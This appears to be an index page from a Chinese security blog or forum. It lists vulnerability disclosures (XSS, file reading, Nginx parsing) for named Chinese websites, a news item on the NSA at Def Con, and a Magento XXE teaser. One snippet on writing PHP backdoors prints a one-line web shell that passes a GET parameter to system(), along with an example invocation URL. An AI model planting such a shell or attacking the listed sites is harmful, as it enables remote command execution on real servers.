文章列表
酷6网(ku6.com)分站 存储型XSS跨站漏洞
酷6网(ku6.com)分站 存储型XSS跨站漏洞
京东商城(jd.com)某分站 存储型XSS跨站漏洞
京东商城(jd.com)某分站 存储型XSS跨站漏洞
盛大在线(sdo.com)某分站 文件读取漏洞
盛大在线(sdo.com)某分站 文件读取漏洞
关于php后门的编写
0x1 原理1、执行系统命令的函数proc_open, popen, exec, shell_exec, passthru,system这里只给出两个例子,其他的可以查看php手册编写system()---------------------------<?phpsystem($_GET);?>---------------------------http://192.168.247.133:81/shell.php?input=dir “``”执行命令``执行命令等
天极网(yesky.com)某分站 反射型XSS跨站漏洞+持久型XSS跨站漏洞
天极网(yesky.com)某分站 反射型XSS跨站漏洞+持久型XSS跨站漏洞
美国安局长"拉拢"黑客 呼吁互联网人才效力政府
美国国家安全局局长基思·亚历山大中将27日出席一场黑客大会,呼吁“互联网人才”与政府联手,确保互联网安全。拢人才第20届“防御态势”(Def Con)黑客大会在美国内华达州拉斯韦加斯市一座酒店举行,一万多名黑客和一些电脑安全企业技术人员与会。作为美国最大情报部门主管和美军网络司令部司令,亚历
中华网(china.com)某分站 反射型XSS跨站漏洞+持久型XSS跨站漏洞
中华网(china.com)某分站 反射型XSS跨站漏洞+持久型XSS跨站漏洞
硅谷动力(enet.com.cn) PHP分站Nginx解析漏洞+文件读取漏洞
硅谷动力(enet.com.cn) PHP分站Nginx解析漏洞+文件读取漏洞
读览天下(dooland.com) Nginx解析漏洞
读览天下(dooland.com) Nginx解析漏洞
Magento eCommerce Platform XXE Injection利用
这是之前的文章,今天注册t00ls论坛顺便转过来,希望各位牛们批评指正,不知道发在哪个板块就发这里了。0x1在wooyun-zone xsser的文章zend framework文件读取漏洞分析中有提及到magento,下面是其中的原文:据@蟋蟀哥哥 在乌云上的漏洞报告提醒,一些开源软件因为使用了zend framework的xml模块功能导
